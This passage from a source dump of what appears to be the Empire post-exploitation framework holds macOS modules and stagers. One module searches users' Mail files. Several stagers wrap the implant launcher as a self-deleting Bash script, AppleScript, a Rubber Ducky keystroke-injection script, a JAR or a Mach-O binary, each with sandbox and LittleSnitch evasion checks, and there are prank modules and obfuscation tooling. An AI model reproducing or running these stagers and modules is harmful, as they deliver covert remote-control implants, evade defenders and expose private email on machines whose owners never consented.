'MinLanguageVersion' : '2.6', 34 | 35 | # list of any references/other comments 36 | 'Comments': [ 37 | "https://davidkoepi.wordpress.com/2013/07/06/macforensics5/" 38 | ] 39 | } 40 | 41 | # any options needed by the module, settable during runtime 42 | self.options = { 43 | # format: 44 | # value_name : {description, required, default_value} 45 | 'Agent' : { 46 | # The 'Agent' option is the only one that MUST be in a module 47 | 'Description' : 'Agent to execute module on.', 48 | 'Required' : True, 49 | 'Value' : '' 50 | }, 51 | 'SearchTerm' : { 52 | # The 'Agent' option is the only one that MUST be in a module 53 | 'Description' : "Term to grep for in email messages.", 54 | 'Required' : False, 55 | 'Value' : '' 56 | } 57 | } 58 | 59 | # save off a copy of the mainMenu object to access external functionality 60 | # like listeners/agent handlers/etc. 61 | self.mainMenu = mainMenu 62 | 63 | # During instantiation, any settable option parameters 64 | # are passed as an object set to the module and the 65 | # options dictionary is automatically set. 
This is mostly 66 | # in case options are passed on the command line 67 | if params: 68 | for param in params: 69 | # parameter format is [Name, Value] 70 | option, value = param 71 | if option in self.options: 72 | self.options[option]['Value'] = value 73 | 74 | def generate(self, obfuscate=False, obfuscationCommand=""): 75 | 76 | searchTerm = self.options['SearchTerm']['Value'] 77 | 78 | script = "cmd = \"find /Users/ -name *.emlx 2>/dev/null" 79 | 80 | if searchTerm != "": 81 | script += "|xargs grep -i '"+searchTerm+"'\"" 82 | else: 83 | script += "\"" 84 | 85 | script += "\nrun_command(cmd)" 86 | 87 | return script 88 | -------------------------------------------------------------------------------- /lib/modules/python/trollsploit/osx/say.py: -------------------------------------------------------------------------------- 1 | class Module: 2 | 3 | def __init__(self, mainMenu, params=[]): 4 | 5 | # metadata info about the module, not modified during runtime 6 | self.info = { 7 | # name for the module that will appear in module menus 8 | 'Name': 'Say', 9 | 10 | # list of one or more authors for the module 11 | 'Author': ['@harmj0y'], 12 | 13 | # more verbose multi-line description of the module 14 | 'Description': ('Performs text to speech using "say".'), 15 | 16 | # True if the module needs to run in the background 17 | 'Background' : False, 18 | 19 | # File extension to save the file as 20 | 'OutputExtension' : '', 21 | 22 | # if the module needs administrative privileges 23 | 'NeedsAdmin' : False, 24 | 25 | # True if the method doesn't touch disk/is reasonably opsec safe 26 | 'OpsecSafe' : False, 27 | 28 | # the module language 29 | 'Language' : 'python', 30 | 31 | # the minimum language version needed 32 | 'MinLanguageVersion' : '2.6', 33 | 34 | # list of any references/other comments 35 | 'Comments': [ ] 36 | } 37 | 38 | # any options needed by the module, settable during runtime 39 | self.options = { 40 | # format: 41 | # value_name : {description, 
required, default_value} 42 | 'Agent' : { 43 | # The 'Agent' option is the only one that MUST be in a module 44 | 'Description' : 'Agent to execute module on.', 45 | 'Required' : True, 46 | 'Value' : '' 47 | }, 48 | 'Text' : { 49 | 'Description' : 'The text to speak.', 50 | 'Required' : True, 51 | 'Value' : '' 52 | }, 53 | 'Voice' : { 54 | 'Description' : 'The voice to use.', 55 | 'Required' : True, 56 | 'Value' : 'alex' 57 | } 58 | } 59 | 60 | # save off a copy of the mainMenu object to access external functionality 61 | # like listeners/agent handlers/etc. 62 | self.mainMenu = mainMenu 63 | 64 | # During instantiation, any settable option parameters 65 | # are passed as an object set to the module and the 66 | # options dictionary is automatically set. This is mostly 67 | # in case options are passed on the command line 68 | if params: 69 | for param in params: 70 | # parameter format is [Name, Value] 71 | option, value = param 72 | if option in self.options: 73 | self.options[option]['Value'] = value 74 | 75 | def generate(self, obfuscate=False, obfuscationCommand=""): 76 | 77 | voice = self.options['Voice']['Value'] 78 | text = self.options['Text']['Value'] 79 | 80 | script = """ 81 | run_command('say -v %s %s') 82 | """ % (voice, text) 83 | 84 | return script 85 | -------------------------------------------------------------------------------- /lib/modules/python/trollsploit/osx/thunderstruck.py: -------------------------------------------------------------------------------- 1 | class Module: 2 | 3 | def __init__(self, mainMenu, params=[]): 4 | 5 | # metadata info about the module, not modified during runtime 6 | self.info = { 7 | # name for the module that will appear in module menus 8 | 'Name': 'Open Safari in the background and play Thunderstruck.', 9 | 10 | # list of one or more authors for the module 11 | 'Author': ['@424f424f'], 12 | 13 | # more verbose multi-line description of the module 14 | 'Description': 'Open Safari in the background and play 
Thunderstruck.', 15 | 16 | # True if the module needs to run in the background 17 | 'Background' : False, 18 | 19 | # File extension to save the file as 20 | 'OutputExtension' : "", 21 | 22 | # if the module needs administrative privileges 23 | 'NeedsAdmin' : False, 24 | 25 | # True if the method doesn't touch disk/is reasonably opsec safe 26 | 'OpsecSafe' : False, 27 | 28 | # the module language 29 | 'Language' : 'python', 30 | 31 | # the minimum language version needed 32 | 'MinLanguageVersion' : '2.6', 33 | 34 | # list of any references/other comments 35 | 'Comments': [''] 36 | } 37 | 38 | # any options needed by the module, settable during runtime 39 | self.options = { 40 | # format: 41 | # value_name : {description, required, default_value} 42 | 'Agent' : { 43 | # The 'Agent' option is the only one that MUST be in a module 44 | 'Description' : 'Agent to run on.', 45 | 'Required' : True, 46 | 'Value' : '' 47 | } 48 | } 49 | 50 | # save off a copy of the mainMenu object to access external functionality 51 | # like listeners/agent handlers/etc. 52 | self.mainMenu = mainMenu 53 | 54 | # During instantiation, any settable option parameters 55 | # are passed as an object set to the module and the 56 | # options dictionary is automatically set. This is mostly 57 | # in case options are passed on the command line 58 | if params: 59 | for param in params: 60 | # parameter format is [Name, Value] 61 | option, value = param 62 | if option in self.options: 63 | self.options[option]['Value'] = value 64 | 65 | def generate(self, obfuscate=False, obfuscationCommand=""): 66 | 67 | # the Python script itself, with the command to invoke 68 | # for execution appended to the end. Scripts should output 69 | # everything to the pipeline for proper parsing. 70 | # 71 | # the script should be stripped of comments, with a link to any 72 | # original reference script included in the comments. 
73 | script = """ 74 | import subprocess 75 | 76 | try: 77 | volume = \"""osascript -e "set Volume 100" ""\" 78 | process1 = subprocess.Popen(volume, stdout=subprocess.PIPE, shell=True) 79 | cmd = \"""open -a "Safari" -g -j https://www.youtube.com/watch?v=v2AC41dglnM""\" 80 | process2 = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True) 81 | print "Thunderstruck engaged!" 82 | 83 | except Exception as e: 84 | print "Module failed" 85 | print e 86 | 87 | """ 88 | return script 89 | -------------------------------------------------------------------------------- /lib/modules/python_jobs_template.py: -------------------------------------------------------------------------------- 1 | class Module: 2 | 3 | def __init__(self, mainMenu, params=[]): 4 | 5 | # metadata info about the module, not modified during runtime 6 | self.info = { 7 | # name for the module that will appear in module menus 8 | 'Name': 'Background Example', 9 | 10 | # list of one or more authors for the module 11 | 'Author': ['@Killswitch-GUI'], 12 | 13 | # more verbose multi-line description of the module 14 | 'Description': ('A quick example how to feed your data to a background job.'), 15 | 16 | # True if the module needs to run in the background 17 | 'Background' : True, 18 | 19 | # File extension to save the file as 20 | 'OutputExtension' : '', 21 | 22 | # if the module needs administrative privileges 23 | 'NeedsAdmin' : False, 24 | 25 | # True if the method doesn't touch disk/is reasonably opsec safe 26 | 'OpsecSafe' : False, 27 | 28 | # the module language 29 | 'Language' : 'python', 30 | 31 | # the minimum language version needed 32 | 'MinLanguageVersion' : '2.6', 33 | 34 | # list of any references/other comments 35 | 'Comments': [ ] 36 | } 37 | 38 | # any options needed by the module, settable during runtime 39 | self.options = { 40 | # format: 41 | # value_name : {description, required, default_value} 42 | 'Agent' : { 43 | # The 'Agent' option is the only one that MUST be in a module 
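'Description' : 'Agent to execute module on.',
                'Required' : True,
                'Value' : ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # During instantiation, any settable option parameters
        # are passed as an object set to the module and the
        # options dictionary is automatically set. This is mostly
        # in case options are passed on the command line
        if params:
            for param in params:
                # parameter format is [Name, Value]
                option, value = param
                if option in self.options:
                    self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the Python source the agent runs as a background job.

        ``obfuscate`` and ``obfuscationCommand`` are accepted so this template
        has the same ``generate`` signature as the other modules in this tree;
        the previous ``generate(self)`` raised TypeError when a caller passed
        them. The template itself does not use either argument.

        Returns:
            The agent-side script: a loop that sleeps two seconds, hands a
            numbered message to ``job_message_buffer`` and repeats.
        """
        # ``job_message_buffer`` is not defined in this file; presumably the
        # agent supplies it when the job runs -- confirm against the agent.
        # The '\\n' stays doubled so the agent-side source contains "\n".
        script = """
x = 0
while True:
    import time
    try:
        time.sleep(2)
        msg = 'NOW inside buffer at message: ' + str(x) + '\\n'
        job_message_buffer(msg)
        x += 1
    except Exception as e:
        print e
"""
        return script
--------------------------------------------------------------------------------
/lib/powershell/Invoke-Obfuscation/Invoke-Obfuscation.psd1:
--------------------------------------------------------------------------------
# This file is part of Invoke-Obfuscation.
#
# Copyright 2017 Daniel Bohannon <@danielhbohannon>
# while at Mandiant
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.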
17 | 18 | 19 | 20 | # 21 | # Module manifest for module 'Invoke-Obfuscation' 22 | # 23 | # Generated by: Daniel Bohannon (@danielhbohannon) 24 | # 25 | # Generated on: 2017-01-19 26 | # 27 | 28 | 29 | 30 | @{ 31 | 32 | # Version number of this module. 33 | ModuleVersion = '1.1' 34 | 35 | # ID used to uniquely identify this module 36 | GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9' 37 | 38 | # Author of this module 39 | Author = 'Daniel Bohannon (@danielhbohannon)' 40 | 41 | # Copyright statement for this module 42 | Copyright = 'Apache License, Version 2.0' 43 | 44 | # Description of the functionality provided by this module 45 | Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.' 46 | 47 | # Minimum version of the Windows PowerShell engine required by this module 48 | PowerShellVersion = '2.0' 49 | 50 | # Minimum version of the Windows PowerShell host required by this module 51 | PowerShellHostVersion = '2.0' 52 | 53 | # Script files (.ps1) that are run in the caller's environment prior to importing this module 54 | ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1') 55 | 56 | # Functions to export from this module 57 | FunctionsToExport = '*' 58 | 59 | # HelpInfo URI of this module 60 | # HelpInfoURI = '' 61 | 62 | } -------------------------------------------------------------------------------- /lib/stagers/multi/bash.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | 4 | class Stager: 5 | 6 | def __init__(self, mainMenu, params=[]): 7 | 8 | self.info = { 9 | 'Name': 'BashScript', 10 | 11 | 'Author': ['@harmj0y'], 12 | 13 | 'Description': ('Generates self-deleting 
Bash script to execute the Empire stage0 launcher.'), 14 | 15 | 'Comments': [ 16 | '' 17 | ] 18 | } 19 | 20 | # any options needed by the stager, settable during runtime 21 | self.options = { 22 | # format: 23 | # value_name : {description, required, default_value} 24 | 'Listener' : { 25 | 'Description' : 'Listener to generate stager for.', 26 | 'Required' : True, 27 | 'Value' : '' 28 | }, 29 | 'Language' : { 30 | 'Description' : 'Language of the stager to generate.', 31 | 'Required' : True, 32 | 'Value' : 'python' 33 | }, 34 | 'OutFile' : { 35 | 'Description' : 'File to output Bash script to, otherwise displayed on the screen.', 36 | 'Required' : False, 37 | 'Value' : '' 38 | }, 39 | 'SafeChecks' : { 40 | 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', 41 | 'Required' : True, 42 | 'Value' : 'True' 43 | }, 44 | 'UserAgent' : { 45 | 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 46 | 'Required' : False, 47 | 'Value' : 'default' 48 | } 49 | } 50 | 51 | # save off a copy of the mainMenu object to access external functionality 52 | # like listeners/agent handlers/etc. 53 | self.mainMenu = mainMenu 54 | 55 | for param in params: 56 | # parameter format is [Name, Value] 57 | option, value = param 58 | if option in self.options: 59 | self.options[option]['Value'] = value 60 | 61 | def generate(self): 62 | 63 | # extract all of our options 64 | language = self.options['Language']['Value'] 65 | listenerName = self.options['Listener']['Value'] 66 | userAgent = self.options['UserAgent']['Value'] 67 | safeChecks = self.options['SafeChecks']['Value'] 68 | 69 | # generate the launcher code 70 | launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks) 71 | 72 | if launcher == "": 73 | print helpers.color("[!] 
Error in launcher command generation.") 74 | return "" 75 | 76 | else: 77 | script = "#!/bin/bash\n" 78 | script += "%s\n" %(launcher) 79 | script += "rm -f \"$0\"\n" 80 | script += "exit\n" 81 | return script 82 | -------------------------------------------------------------------------------- /lib/stagers/osx/applescript.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | 4 | class Stager: 5 | 6 | def __init__(self, mainMenu, params=[]): 7 | 8 | self.info = { 9 | 'Name': 'AppleScript', 10 | 11 | 'Author': ['@harmj0y'], 12 | 13 | 'Description': ('Generates AppleScript to execute the Empire stage0 launcher.'), 14 | 15 | 'Comments': [ 16 | '' 17 | ] 18 | } 19 | 20 | # any options needed by the stager, settable during runtime 21 | self.options = { 22 | # format: 23 | # value_name : {description, required, default_value} 24 | 'Listener' : { 25 | 'Description' : 'Listener to generate stager for.', 26 | 'Required' : True, 27 | 'Value' : '' 28 | }, 29 | 'Language' : { 30 | 'Description' : 'Language of the stager to generate.', 31 | 'Required' : True, 32 | 'Value' : 'python' 33 | }, 34 | 'OutFile' : { 35 | 'Description' : 'File to output AppleScript to, otherwise displayed on the screen.', 36 | 'Required' : False, 37 | 'Value' : '' 38 | }, 39 | 'SafeChecks' : { 40 | 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', 41 | 'Required' : True, 42 | 'Value' : 'True' 43 | }, 44 | 'UserAgent' : { 45 | 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 46 | 'Required' : False, 47 | 'Value' : 'default' 48 | } 49 | } 50 | 51 | # save off a copy of the mainMenu object to access external functionality 52 | # like listeners/agent handlers/etc. 
53 | self.mainMenu = mainMenu 54 | 55 | for param in params: 56 | # parameter format is [Name, Value] 57 | option, value = param 58 | if option in self.options: 59 | self.options[option]['Value'] = value 60 | 61 | def generate(self): 62 | 63 | # extract all of our options 64 | language = self.options['Language']['Value'] 65 | listenerName = self.options['Listener']['Value'] 66 | userAgent = self.options['UserAgent']['Value'] 67 | safeChecks = self.options['SafeChecks']['Value'] 68 | 69 | # generate the launcher code 70 | launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks) 71 | 72 | if launcher == "": 73 | print helpers.color("[!] Error in launcher command generation.") 74 | return "" 75 | 76 | else: 77 | launcher = launcher.replace('"', '\\"') 78 | 79 | applescript = "do shell script \"%s\"" % (launcher) 80 | 81 | return applescript 82 | -------------------------------------------------------------------------------- /lib/stagers/osx/ducky.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Stager: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'DuckyLauncher', 9 | 10 | 'Author': ['@xorrior'], 11 | 12 | 'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for Empire.'), 13 | 14 | 'Comments': [ 15 | '' 16 | ] 17 | } 18 | 19 | # any options needed by the stager, settable during runtime 20 | self.options = { 21 | # format: 22 | # value_name : {description, required, default_value} 23 | 'Listener' : { 24 | 'Description' : 'Listener to generate stager for.', 25 | 'Required' : True, 26 | 'Value' : '' 27 | }, 28 | 'Language' : { 29 | 'Description' : 'Language of the stager to generate.', 30 | 'Required' : True, 31 | 'Value' : 'python' 32 | }, 33 | 'SafeChecks' : { 34 | 'Description' : 'Switch. 
Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', 35 | 'Required' : True, 36 | 'Value' : 'True' 37 | }, 38 | 'OutFile' : { 39 | 'Description' : 'File to output duckyscript to, otherwise displayed on the screen.', 40 | 'Required' : False, 41 | 'Value' : '' 42 | }, 43 | 'UserAgent' : { 44 | 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 45 | 'Required' : False, 46 | 'Value' : 'default' 47 | } 48 | } 49 | 50 | # save off a copy of the mainMenu object to access external functionality 51 | # like listeners/agent handlers/etc. 52 | self.mainMenu = mainMenu 53 | 54 | for param in params: 55 | # parameter format is [Name, Value] 56 | option, value = param 57 | if option in self.options: 58 | self.options[option]['Value'] = value 59 | 60 | 61 | def generate(self): 62 | 63 | # extract all of our options 64 | language = self.options['Language']['Value'] 65 | listenerName = self.options['Listener']['Value'] 66 | userAgent = self.options['UserAgent']['Value'] 67 | safeChecks = self.options['SafeChecks']['Value'] 68 | 69 | # generate the launcher code 70 | launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks) 71 | 72 | if launcher == "": 73 | print helpers.color("[!] 
Error in launcher command generation.") 74 | return "" 75 | else: 76 | 77 | duckyCode = "DELAY 1000\n" 78 | duckyCode += "COMMAND SPACE\n" 79 | duckyCode += "DELAY 1000\n" 80 | duckyCode += "STRING TERMINAL\n" 81 | duckyCode += "ENTER \n" 82 | duckyCode += "DELAY 1000\n" 83 | duckyCode += "STRING "+launcher 84 | duckyCode += "\nENTER\n" 85 | duckyCode += "DELAY 1000\n" 86 | 87 | return duckyCode 88 | -------------------------------------------------------------------------------- /lib/stagers/osx/jar.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Stager: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Jar', 9 | 10 | 'Author': ['@xorrior'], 11 | 12 | 'Description': ('Generates a JAR file.'), 13 | 14 | 'Comments': [ 15 | '' 16 | ] 17 | } 18 | 19 | # any options needed by the stager, settable during runtime 20 | self.options = { 21 | # format: 22 | # value_name : {description, required, default_value} 23 | 'Listener' : { 24 | 'Description' : 'Listener to generate stager for.', 25 | 'Required' : True, 26 | 'Value' : '' 27 | }, 28 | 'Language' : { 29 | 'Description' : 'Language of the stager to generate.', 30 | 'Required' : True, 31 | 'Value' : 'python' 32 | }, 33 | 'SafeChecks' : { 34 | 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', 35 | 'Required' : True, 36 | 'Value' : 'True' 37 | }, 38 | 'OutFile' : { 39 | 'Description' : 'File to output duckyscript to.', 40 | 'Required' : True, 41 | 'Value' : '/tmp/out.jar' 42 | }, 43 | 'UserAgent' : { 44 | 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 45 | 'Required' : False, 46 | 'Value' : 'default' 47 | } 48 | } 49 | 50 | # save off a copy of the mainMenu object to access external functionality 51 | # like listeners/agent handlers/etc. 
52 | self.mainMenu = mainMenu 53 | 54 | for param in params: 55 | # parameter format is [Name, Value] 56 | option, value = param 57 | if option in self.options: 58 | self.options[option]['Value'] = value 59 | 60 | 61 | def generate(self): 62 | 63 | # extract all of our options 64 | language = self.options['Language']['Value'] 65 | listenerName = self.options['Listener']['Value'] 66 | userAgent = self.options['UserAgent']['Value'] 67 | SafeChecks = self.options['SafeChecks']['Value'] 68 | # generate the launcher code 69 | launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=SafeChecks) 70 | 71 | if launcher == "": 72 | print helpers.color("[!] Error in launcher command generation.") 73 | return "" 74 | else: 75 | launcher = launcher.replace('"','\\"') 76 | jarBytes = self.mainMenu.stagers.generate_jar(launcherCode=launcher) 77 | return jarBytes 78 | -------------------------------------------------------------------------------- /lib/stagers/osx/launcher.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | 4 | class Stager: 5 | 6 | def __init__(self, mainMenu, params=[]): 7 | 8 | self.info = { 9 | 'Name': 'Launcher', 10 | 11 | 'Author': ['@harmj0y'], 12 | 13 | 'Description': ('Generates a one-liner stage0 launcher for Empire.'), 14 | 15 | 'Comments': [ 16 | '' 17 | ] 18 | } 19 | 20 | # any options needed by the stager, settable during runtime 21 | self.options = { 22 | # format: 23 | # value_name : {description, required, default_value} 24 | 'Listener' : { 25 | 'Description' : 'Listener to generate stager for.', 26 | 'Required' : True, 27 | 'Value' : '' 28 | }, 29 | 'Language' : { 30 | 'Description' : 'Language of the stager to generate.', 31 | 'Required' : True, 32 | 'Value' : 'python' 33 | }, 34 | 'OutFile' : { 35 | 'Description' : 'File to output launcher to, otherwise displayed on the screen.', 36 | 'Required' : 
False, 37 | 'Value' : '' 38 | }, 39 | 'SafeChecks' : { 40 | 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', 41 | 'Required' : True, 42 | 'Value' : 'True' 43 | }, 44 | 'Base64' : { 45 | 'Description' : 'Switch. Base64 encode the output.', 46 | 'Required' : True, 47 | 'Value' : 'True' 48 | }, 49 | 'UserAgent' : { 50 | 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 51 | 'Required' : False, 52 | 'Value' : 'default' 53 | } 54 | } 55 | 56 | # save off a copy of the mainMenu object to access external functionality 57 | # like listeners/agent handlers/etc. 58 | self.mainMenu = mainMenu 59 | 60 | for param in params: 61 | # parameter format is [Name, Value] 62 | option, value = param 63 | if option in self.options: 64 | self.options[option]['Value'] = value 65 | 66 | def generate(self): 67 | 68 | # extract all of our options 69 | language = self.options['Language']['Value'] 70 | listenerName = self.options['Listener']['Value'] 71 | base64 = self.options['Base64']['Value'] 72 | userAgent = self.options['UserAgent']['Value'] 73 | safeChecks = self.options['SafeChecks']['Value'] 74 | 75 | encode = False 76 | if base64.lower() == "true": 77 | encode = True 78 | 79 | # generate the launcher code 80 | launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=encode, userAgent=userAgent, safeChecks=safeChecks) 81 | 82 | if launcher == "": 83 | print helpers.color("[!] 
Error in launcher command generation.") 84 | return "" 85 | 86 | return launcher 87 | -------------------------------------------------------------------------------- /lib/stagers/osx/macho.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | 4 | class Stager: 5 | 6 | def __init__(self, mainMenu, params=[]): 7 | 8 | self.info = { 9 | 'Name': 'macho', 10 | 11 | 'Author': ['@xorrior'], 12 | 13 | 'Description': ('Generates a macho executable.'), 14 | 15 | 'Comments': [ 16 | '' 17 | ] 18 | } 19 | 20 | # any options needed by the stager, settable during runtime 21 | self.options = { 22 | # format: 23 | # value_name : {description, required, default_value} 24 | 'Listener' : { 25 | 'Description' : 'Listener to generate stager for.', 26 | 'Required' : True, 27 | 'Value' : '' 28 | }, 29 | 'Language' : { 30 | 'Description' : 'Language of the stager to generate.', 31 | 'Required' : True, 32 | 'Value' : 'python' 33 | }, 34 | 'OutFile' : { 35 | 'Description' : 'File to write macho to.', 36 | 'Required' : True, 37 | 'Value' : '' 38 | }, 39 | 'SafeChecks' : { 40 | 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', 41 | 'Required' : True, 42 | 'Value' : 'True' 43 | }, 44 | 'UserAgent' : { 45 | 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 46 | 'Required' : False, 47 | 'Value' : 'default' 48 | } 49 | } 50 | 51 | # save off a copy of the mainMenu object to access external functionality 52 | # like listeners/agent handlers/etc. 
53 | self.mainMenu = mainMenu 54 | 55 | for param in params: 56 | # parameter format is [Name, Value] 57 | option, value = param 58 | if option in self.options: 59 | self.options[option]['Value'] = value 60 | 61 | def generate(self): 62 | 63 | # extract all of our options 64 | language = self.options['Language']['Value'] 65 | listenerName = self.options['Listener']['Value'] 66 | savePath = self.options['OutFile']['Value'] 67 | userAgent = self.options['UserAgent']['Value'] 68 | safeChecks = self.options['SafeChecks']['Value'] 69 | 70 | # generate the launcher code 71 | # turn base64 encoding off 72 | encode = False 73 | launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=encode, userAgent=userAgent, safeChecks=safeChecks) 74 | 75 | if launcher == "": 76 | print helpers.color("[!] Error in launcher command generation.") 77 | return "" 78 | 79 | else: 80 | 81 | launcher = launcher.strip('echo').strip(' | python &').strip("\"") 82 | macho = self.mainMenu.stagers.generate_macho(launcher) 83 | return macho 84 | -------------------------------------------------------------------------------- /setup/cert.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # generate a self-signed CERT 4 | #openssl genrsa -des3 -out ./data/empire.orig.key 2048 5 | #openssl rsa -in ./data/empire.orig.key -out ./data/empire.key 6 | #openssl req -new -key ./data/empire.key -out ./data/empire.csr 7 | #openssl x509 -req -days 365 -in ./data/empire.csr -signkey ./data/empire.key -out ./data/empire.crt 8 | 9 | #openssl req -new -x509 -keyout ../data/empire-priv.key -out ../data/empire-chain.pem -days 365 -nodes 10 | openssl req -new -x509 -keyout ../data/empire-priv.key -out ../data/empire-chain.pem -days 365 -nodes -subj "/C=US" >/dev/null 2>&1 11 | 12 | echo -e "\n [*] Certificate written to ../data/empire-chain.pem" 13 | echo -e "\r [*] Private key written to ../data/empire-priv.key\n" 14 | 
-------------------------------------------------------------------------------- /setup/reset.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ $EUID -ne 0 ]]; then 4 | echo " [!]This script must be run as root" 1>&2 5 | exit 1 6 | fi 7 | 8 | IFS='/' read -a array <<< pwd 9 | 10 | if [[ "$(pwd)" != *setup ]] 11 | then 12 | cd ./setup 13 | fi 14 | 15 | # reset the database 16 | if [ -e ../data/empire.db ] 17 | then 18 | rm ../data/empire.db 19 | fi 20 | 21 | ./setup_database.py 22 | cd .. 23 | 24 | # remove the debug file if it exists 25 | if [ -e empire.debug ] 26 | then 27 | rm empire.debug 28 | fi 29 | 30 | # remove the download folders 31 | if [ -d ./downloads/ ] 32 | then 33 | rm -rf ./downloads/ 34 | fi 35 | 36 | # start up Empire 37 | # ./empire --debug 2 38 | ./empire 39 | --------------------------------------------------------------------------------